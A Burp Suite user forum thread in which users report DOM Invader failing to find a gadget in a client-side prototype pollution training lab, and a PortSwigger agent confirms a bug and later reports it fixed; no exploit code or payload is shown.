Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

LAB Client-side prototype pollution in third-party libraries

Luca | Last updated: Apr 19, 2023 12:01AM UTC

Hi, can anybody double-check that DOM Invader is able to find a gadget for this one? I followed the solution steps and it doesn't seem to find the gadget as mentioned. Thank you

Luca | Last updated: Apr 19, 2023 12:35AM UTC

I'm also wondering why the payload works when clicking on "view exploit" in the exploit server, but not if I copy and paste it manually on the home page...

Luca | Last updated: Apr 20, 2023 08:41AM UTC

Ping... can anybody from Portswigger check this please?

Ben, PortSwigger Agent | Last updated: Apr 20, 2023 08:47AM UTC

Hi Luca, We will take a look at this particular lab and get back to you in due course.

Ben, PortSwigger Agent | Last updated: Apr 20, 2023 04:33PM UTC

Hi Luca, I can replicate the behaviour you are seeing - we are currently investigating why this is happening. I will update this forum thread when I find out some more information.

Luca | Last updated: Apr 24, 2023 09:53PM UTC

Fortunately I have this page still open... for some reason it does not show up in a search :)

unkown | Last updated: Apr 28, 2023 10:24AM UTC

I saw this bug a week ago.

Ben, PortSwigger Agent | Last updated: May 03, 2023 12:51PM UTC

Hi all, Having discussed this with the team we think this is a bug in DOM Invader related to some of the patches being applied to Chrome. We are going to have to work on fix to get this resolved so will update this forum thread when we believe it has been fixed.

Luke | Last updated: Mar 04, 2024 09:41AM UTC

Hi - just want to know what the status is for this? can get my payload to trigger when I view the exploit, but no "Solved" when delivering to victim

Ben, PortSwigger Agent | Last updated: Mar 04, 2024 10:53AM UTC

Hi Luke, Apologies, it looks like this thread was not updated at the time. Essentially the issue with DOM Invader was fixed shortly after this issue was reported. I have just run through this particular lab and been able to solve it using the solution provided so it does appear to be working. What does the exploit you are trying to use look like?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.